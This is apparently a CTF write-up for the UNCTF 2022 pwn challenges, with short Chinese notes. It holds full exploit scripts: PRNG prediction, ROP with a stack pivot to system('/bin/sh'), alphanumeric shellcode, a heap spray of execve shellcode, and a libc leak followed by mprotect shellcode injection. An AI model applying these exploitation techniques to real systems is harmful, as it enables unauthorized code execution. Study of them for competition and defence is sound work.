unctf-2022-pwn-all

unctf2022_pwn_all_wp

welcomeUNCTF2022

 # Welcome challenge: the service presumably only wants this exact string; sl() sends it followed by '\n'.
 sl("UNCTF&2022")

石头剪刀布

预测随机数: 程序用固定种子调用 srand, 用 ctypes 加载本机 libc 重放同一串 rand() 就能预测每一轮出招(前提是本机 libc 的 rand 实现与目标一致, 即同为 glibc)。

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-13 02:17:09
LastEditTime: 2022-11-13 02:20:30
Description: 
'''

from pwncli import *
from ctypes import *
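cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

# Replay the target's PRNG locally instead of guessing: the binary seeds
# rand() with a constant (0xa, presumably -- confirm in the disassembly), so
# the same srand()/rand() sequence from a libc of the same family reproduces
# every move. This is a host-libc dependency: on a musl or macOS host
# LoadLibrary fails or rand() differs, and the prediction silently breaks.
dll = cdll.LoadLibrary("libc.so.6")
dll.srand.restype = None  # srand() returns void; the old `seed = dll.srand(...)` only captured garbage
dll.srand(0xa)

sla('Will you learn about something of pwn later?(y/n)', 'y')

ROUNDS = 100
for _ in range(ROUNDS):
    # The service's move is taken to be rand() % 3; `(move + 2) % 3` is the
    # reply that wins under this binary's move encoding (note it is +2, not
    # the usual +1 -- verify against the disassembly).
    reply = str((dll.rand() % 3 + 2) % 3)
    sla("round", reply)

io.interactive()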

Move your heart

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-12 20:28:27
LastEditTime: 2022-11-12 20:39:59
Description: 
'''

from pwncli import *

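cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

# Value the service wants at the "num:" prompt before it prints the "gift"
# leak -- presumably compared against a constant in the binary; confirm.
MAGIC_NUM = 0x110dfc17
sla("num:", str(MAGIC_NUM))
ru("gift:")
leak_addr = int(rl(), 16)  # int() ignores the trailing newline
log_address_ex2(leak_addr)

# Binary is not PIE (fixed 0x40xxxx gadget addresses).
POP_RDI_RET = 0x00000000004013d3
LEAVE_RET = 0x4012D6  # presumably `leave; ret`: that is what the pivot below relies on -- confirm

# ROP chain at the start of the buffer. "/bin/sh" is its fourth qword, so it
# sits BINSH_OFF bytes into the same buffer and is addressable via leak_addr.
BINSH_OFF = 3 * 8
chain = [
    POP_RDI_RET,
    leak_addr + BINSH_OFF,  # rdi = "/bin/sh"
    elf.plt.system,
    '/bin/sh\x00',
]

payload = flat({
    0: chain,
    # Saved-rbp / return-address slots. Returning into `leave; ret` with
    # rbp = leak_addr - 8 makes `leave` set rsp = leak_addr and the `ret`
    # start the chain above. This only works if leak_addr is the address of
    # this very buffer -- which is what the "gift" leak is assumed to be.
    0x20: leak_addr - 8,
    0x28: LEAVE_RET,
})
sl(payload)

io.interactive()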

int_0x80

可见字符shellcode: 输入只允许可见(可打印)字符, 直接用现成的 x64 alphanumeric shellcode 即可。

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-13 14:47:30
LastEditTime: 2022-11-13 15:00:13
Description: 
'''

from pwncli import *

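cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

# Ready-made x86-64 alphanumeric shellcode (taken from ShellcodeMall). Every
# byte is in [0-9A-Za-z], which is what gets it through the challenge's
# visible-character filter. Payloads of this family are self-modifying and
# expect a register (commonly rax) to hold the shellcode's own address when
# control lands on it -- check how the binary jumps to the buffer before
# reusing it elsewhere. Expected effect is an execve of a shell (not verified
# here). The `$rebase` in the breakpoint below implies the binary is PIE.
sc = b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
if not sc.isalnum():
    raise ValueError("shellcode must stay alphanumeric to pass the filter")

# Debug aid kept from development: gdb.attach(io, 'b *$rebase(0x13AB)') then sleep(2).
sl(sc)

io.interactive()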

fakehero

chunk有可执行权限,而且申请的chunk指针存储在栈上,把shellcode写进每个chunk再喷射chunk指针到栈上就完事了

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-13 02:22:57
LastEditTime: 2022-11-13 02:55:53
Description: 
'''

from pwncli import *

# Let pwncli parse the command line (local / remote / debug) and fill `gift`.
cli_script()

# Process handle, target ELF and libc as resolved by pwncli.
io, elf, libc = gift["io"], gift["elf"], gift.libc

# Run-mode metadata exposed by pwncli.
filename = gift.filename    # current filename
is_debug = gift.debug       # is debug or not
is_remote = gift.remote     # is remote or not
gdb_pid = gift.gdb_pid      # gdb pid if debug

def cmd(idx):
    """Select menu entry `idx` at the `> ` prompt (sent as a decimal line)."""
    choice = str(idx)
    sla('> ', choice)

def add(idx, size, cont):
    """Menu 1: request a chunk in slot `idx` of `size` bytes holding `cont`.

    `cont` goes straight to sla(), so it is sent followed by a newline; a
    0x0a byte inside `cont` would presumably cut a line-based read short.
    """
    cmd(1)
    for prompt, answer in (('index: \n', str(idx)), ('Size: \n', str(size))):
        sla(prompt, answer)
    sla('Content: \n', cont)

def free(idx):
    """Menu 2: presumably releases the chunk in slot `idx`; unused by this exploit."""
    slot = str(idx)
    cmd(2)
    sla('Index: \n', slot)

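# One 0x100-byte chunk body: execve("/bin/sh") shellcode (per its name) at
# offset 0 and a second copy at offset 27; flat() fills the gap and pads to
# CHUNK_SIZE with its default filler. The duplicate is presumably there so
# that the entry offset the binary jumps to inside the chunk still hits
# shellcode -- why exactly 27 is not visible here; confirm in the disassembly.
CHUNK_SIZE = 0x100
SPRAY_COUNT = 64
sc = flat({
    0: ShellcodeMall.amd64.execve_bin_sh,
    27: ShellcodeMall.amd64.execve_bin_sh,
    CHUNK_SIZE: '',
})

# Heap spray: the chunks are executable and their pointers are kept on the
# stack, so filling every slot with the same shellcode makes any of those
# stack slots a valid landing address.
for slot in range(SPRAY_COUNT):
    add(slot, CHUNK_SIZE, sc)

# Menu 3 is the trigger that transfers control, presumably through one of
# the sprayed chunk pointers on the stack.
cmd(3)

io.interactive()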

checkin

程序给内存错误信号(一般是SIGSEGV)注册了一个输出flag的处理函数,我们只要触发该信号即可。

但是呃呃题目的flag头不是UNCTF,搞得我以为有2个flag文件。

用mprotect把代码段改成可执行后ret2shellcode扫了扫目录,发现就是flag.txt,然后去问客服得知是出题人把flag头搞错了

docker里好像把dash(/bin/sh)删除了,所以system/execve("/bin/sh")拿不到shell,只能用shellcode直接读flag.txt

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-13 14:43:43
LastEditTime: 2022-11-13 16:33:47
Description: 
'''

from pwncli import *

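cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

# Offset from the start of the overflowed buffer to the saved return address;
# both ROP stages below place their chain there.
RET_OFF = 0x58

# Addresses inside the non-PIE binary (mapped at 0x400000).
POP_RDI_RET = 0x0000000000400a53
VULN_AGAIN = 0x400938   # return target after the leak -- presumably re-enters the vulnerable input path; confirm
TEXT_BASE = 0x400000    # ELF base; stage 2 makes it RWX and reuses it as the shellcode buffer

# Offsets for the remote libc (libc6_2.23-0ubuntu11.3, see the one_gadget
# listing below). A different libc build needs all three re-derived.
PUTS_OFF = 0x06f6a0
POP_RDX_RSI_RET_OFF = 0x00000000001151c9
MPROTECT_OFF = 0x0000000000101870


def _overflow(chain):
    """Run one round of the vulnerable input and overwrite the return address.

    Sends a name, then ' -65535' as the size -- the negative value is what the
    original exploit used; it presumably passes a signed length check and lets
    the subsequent read overrun the buffer (confirm in the disassembly) -- and
    finally `chain` positioned at RET_OFF so its first entry becomes the
    return address.
    """
    sl('name')
    sla('size', ' -65535')
    sl(flat({RET_OFF: chain}))


# Stage 1: leak puts@GOT via puts@PLT, then go back for a second overflow.
_overflow([
    POP_RDI_RET,
    elf.got.puts,
    elf.plt.puts,
    VULN_AGAIN,
])

lb = recv_current_libc_addr(PUTS_OFF)   # libc base = leaked puts - PUTS_OFF
log_address_ex2(lb)

'''
$ one_gadget libc6_2.23-0ubuntu11.3_amd64.so
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''
# system() / "/bin/sh" (lb + 0x0453a0 / lb + 0x18ce57) and the one_gadgets
# above were considered but not used: the challenge container has no /bin/sh
# (dash removed), so a shell never spawns. The flag is read with shellcode.

# Stage 2: mprotect(TEXT_BASE, 0x4000, RWX); read(0, TEXT_BASE, 0x100) the
# shellcode over the start of the binary; return into it. Clobbering the ELF
# header / early .text is acceptable here only because the shellcode never
# returns into the program.
pop_rdx_rsi_ret = lb + POP_RDX_RSI_RET_OFF
mprotect_addr = lb + MPROTECT_OFF
_overflow([
    POP_RDI_RET, TEXT_BASE,
    pop_rdx_rsi_ret, 7, 0x4000,         # rdx = prot (RWX), rsi = len
    mprotect_addr,

    POP_RDI_RET, 0,
    pop_rdx_rsi_ret, 0x100, TEXT_BASE,  # rdx = count, rsi = buf
    elf.plt.read,

    TEXT_BASE,                          # ret into the shellcode just read
])

# Empirical wait, not a synchronization primitive: it presumably keeps the
# shellcode from being coalesced with the previous send and consumed by the
# overflow read instead of by the chain's read(0, TEXT_BASE, 0x100).
sleep(2)
# No shell in the container, so open/read/write flag.txt directly.
sl(asm(shellcraft.cat("flag.txt")))

io.interactive()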